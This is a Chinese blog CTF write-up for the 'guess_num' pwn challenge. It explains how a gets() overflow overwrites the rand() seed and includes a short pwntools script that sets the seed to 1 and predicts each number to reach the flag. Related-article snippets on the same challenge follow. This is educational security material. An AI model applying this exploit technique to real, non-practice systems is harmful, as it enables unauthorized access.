guess_num--writeup(含python和C++混合编程)

最新推荐文章于 2022-07-05 21:11:55 发布
最新推荐文章于 2022-07-05 21:11:55 发布
阅读量598 收藏 5
点赞数 21
分类专栏: CTF-PWN # 攻防世界-pwn -- WriteUp 文章标签: CTF PWN ROP 栈溢出 攻防世界
本文为ATFWUS原创,允许转载,但请附上作者署名和本文链接
本文链接:https://blog.csdn.net/ATFWUS/article/details/104593645
版权

文件下载地址:

链接:https://pan.baidu.com/s/13uowRQszM6GRvKMEYGG16g
提取码:le64

目录

0x01.分析

0x02.重点

0x01.分析

checksec:

64位程序,这,好像不太友好,全部保护措施全部开启,暂时无法直接使用栈溢出。

查看源码:

流程大概是,先要输入名字,然后开始猜数,有一次猜错就退出程序,必须每次猜对,然后进入sub函数,拿到flag。

突破点肯定是v7,只有这里使用了gets函数,虽然不可以栈溢出,但是可以覆盖,查看一下v7:

发现随机数种子就在下方,申请的空间是30h,到seed的距离是20h,可以覆盖,那么如何具体覆盖这个seed呢,由于每次都要猜对,所以肯定要替换这个种子,然后之后就按照对应的种子把数数出来就行了,这个种子是C语言里面的函数,我们使用python写脚本,于是自然想到了python和C语言的混合编程,可以使用python的内置函数ctypes。

0x02.重点

  • 我们使用python标准库中自带的ctypes模块进行python和c的混合编程。
  • 目的是使用libc中的共享库,来获取相应种子的随机数值。

 

  • srand()是随机数种子
  • rand()是随机数,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。

libc共享库的查找:

可以用ldd命令查找,也可以在脚本中通过elf文件查找。

elf = ELF('./guess_num')
libc = elf.libc
  • 这样我们只需要将种子覆盖为1,然后调用C语言的libc共享库,得到这个种子产生的随机值,就能够保证每次猜对了。

0x03:exp

##!/usr/bin/env python
from pwn import*
from ctypes import*
r=remote("111.198.29.45",31410)
#r=process('./guess_num')

libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload=0x20*'A'+p64(1)

r.recvuntil("name:")
r.sendline(payload)
libc.srand(1)
for i in range(0,10):
    num=str(libc.rand()%6+1)
    r.recvuntil("number:")
    r.sendline(num)

r.interactive()

 

ATFWUS
关注
  • 21
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Guess (浮点数,高精度)
Draven__的博客
08-17 863
点击打开链接 题意:有 n 位选手参加编程比赛。比赛有3道题目,每个选手的每道题目都有一个评测之前的预得分(这个分数和选手提交程序的时间相关,提交的越早,预得分越大)。 接下来 是系统评测。如果某道题未通过测试,则改题的实际得分为0分,否则得分等于预得分。得分相同的选手,ID小的排在前面。 问是否能给出所有3n个得分以及最后的实际名次。如果可能,输出最后一名的最高可能得分。每个预得分均为小于10...
猜数字游戏(C语言)
zz070的博客
10-18 639
思路: 首先,创建一个menu()函数,由于存放猜数游戏的菜单;然后,创建一个guess()函数,用于存放猜数的过程;最后,在main()函数中调用menu()函数和guess()函数即可。 对于menu()函数,只需要用printf(“”)输出可以选择的游戏选项:1、play game 2、exist 即可。 对于guess()函数,先生成一个随机数,再将生成的随机数与输入值进行比较,在wh...
PWN做题笔记4-guess_num(已修订)
qq_40923256的博客
04-19 377
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5057&page=1 如图,程序为64位ELF文件 安全机制全部开启,不太可能是注入地址 程序的功能为输入用户名,之后猜10个数,全部猜对可以获取flag main函数用户名存在注入点 查看栈结构可以发现用户名可以覆盖随机数种子 构造输入:b"A"*(0x20)+p32(0),随机数种子为0 以相同的...
xctf--新手区--guess_num
gclome的博客
04-20 721
writeup 老规矩,先checksec下,查看保护机制 64位程序,保护机制全开啊,不过不慌,先运行一下大致看看 两次输入分别是Your name和 guess number ,其余皆是程序输出,貌似没有得到什么有用的东西。 再次借助强大的IDA查看源码: 分析源码得知,我们要输入十次随机数产生的值,如果一次错,那就GG,十次全部输入正确,就success!,flag应该就藏在succes...
guess_num.py
08-11
自己用python 写了个非常简单的入门小游戏,猜数字,可以修改源码,加大难度,挺好玩的 玩法如下: 1、系统随机给出一个1-20的数字 2、玩家来猜,共5次机会,猜对后提示: !!Great,you guess the num! 用完5次机会还没猜对,提示: Your retry times>5,Game over! 3、期间会有提示 猜的数字是偏大,还是偏小
guess_num
4HftysN
08-02 693
主函数代码 这道题的思路是通过v8的输入 覆盖seed的值 进入v8可以看到与seed相差0x20 此处就可构造payload=‘a’*0x20+p64(1) -------------------------------------------------设置种子数为1 通过控制种子数seed来控制随机数rand 以取得flag 在调用rand()函数时,必须先利用srand...
[攻防世界]guess_num
逆向萌新的博客
06-01 653
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
攻防世界 guess_num
09-27 1029
1.题目 2.Ida反汇编 3.根据上图代码,分析基本流程。 流程:随机种子生成随机数,对比随机数和输入的数字,连续正确10次就成功。 初看好像不可能成功,怎么可能猜对随机数十次?其实srand生成的随机数是伪随机数。其实就是一个很长的数字字符串,然后根据种子定位到这个字符串某个点,然后每次生成随机数就读一个数字字符。也就是说,如果我们的种子是一样的,相同的随机次序我们得到的随机数是一样的。 于是,现在的问题变成了我们怎么得到程序的种子?或者我们是否可以修改程序的种子? 查看c源码.
Python [Leetcode 374]Guess Number Higher or Lower
dkk37351的博客
07-30 156
题目描述: We are playing the Guess Game. The game is as follows: I pick a number from1ton. You have to guess which number I picked. Every time you guess wrong, I'll tell you whether the numb...
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
2、我们获得了一份 config 文件,里面有最重要的 authkey 2、dz 有正常的备份数据,备份数据里有重要的 key 值 1、配合报错注入的攻击链 2
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone ...cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 ... 面向返
buuoj re逆向1-64题writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64题writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctfwriteup
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1068
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
Python案例之猜数字
My_YueR的博客
07-05 1260
案例主要要求是在一定范围内生成一个随机数,的用户可以自行决定游戏难度并且猜错了会有猜大了或是猜小了的提醒。用户必须在规定次数内猜出数字否者挑战失败。这里我们要考虑到如果用户输入了一个非数字报错的情况,我们采用异常处理的方法来让用户进行重新输入。如下生成随机数:#引入生成随机数的模块import random#程序设定生成 1-20 之间的一个随机数num = random.randint(1,20)如下进行异常处理: try: # 这里使用异常判断,若用户输入的不为数字则重新输入并且扣除一次
攻防世界-guess_num
qq_45771413的博客
04-23 461
查看保护 好家伙,不留活口(;´д`)ゞ IDA 逻辑很简单,输入名字后,程序会生成一个随机数种子,然后循环10次以下操作: 输入一个数,这个数和本次随机循环数值除以6的余数+1是否相等,相等则跳转到函数 sub_C3E() ,这里面直接有 system(“cat flag”); 分析 10次随机数必不能每次都对,所以得想办法绕过随机数或者修改随机数种子,让其种子固定则其生成的随机数也固定。 本体最有可能栈溢出的地方就是gets,gets获取输入存到v7,进入v7看看有没有漏洞: 可以看到v7下面就是s
Python 轻松学会写程式笔记-第4节46-猜数字游戏(试听版本)
weixin_45775044的博客
12-07 291
产生一个随机整数 我们要做什么 先import对不对 import random 先把random这个模组 载入进来我的程式 我才可以使用这个模组来产生随机整数 那它的这个function 它的这个函式叫做randint 这个功能叫做randint 以后我们会讲什么是函式 好 范围是1到100嘛 那我开始值是1 结束值是100 然后我把它存成r 就是这个随机数 我现在把它存下来 右边存到左边嘛...
攻防世界guess_num
weixin_52296042的博客
10-29 150
我们分析程序如果v4 = v6 连续十次则循环结束,然后执行后面函数获得flag 如果数字不等则退出 我们观察栈空间发现var-30(v7)与seed相差0x20。 然后我们可以利用gets函数的天然漏洞,覆盖seed为3, 下面是脚本。我们可以利用ldd file查看libc。这里利用ctypes库实现python、c混合编程 脚本中的cat_flag函数地址是多余的 新人博客,如果错误。请大佬指正 ...
guess-xsctf
最新发布
07-28
根据提供的引用内容,我无法确定问题"guess-xsctf"的具体义。请提供更多的信息或者明确你的问题,我将尽力回答。 #### 引用[.reference_title] - *1* [xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATFWUS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值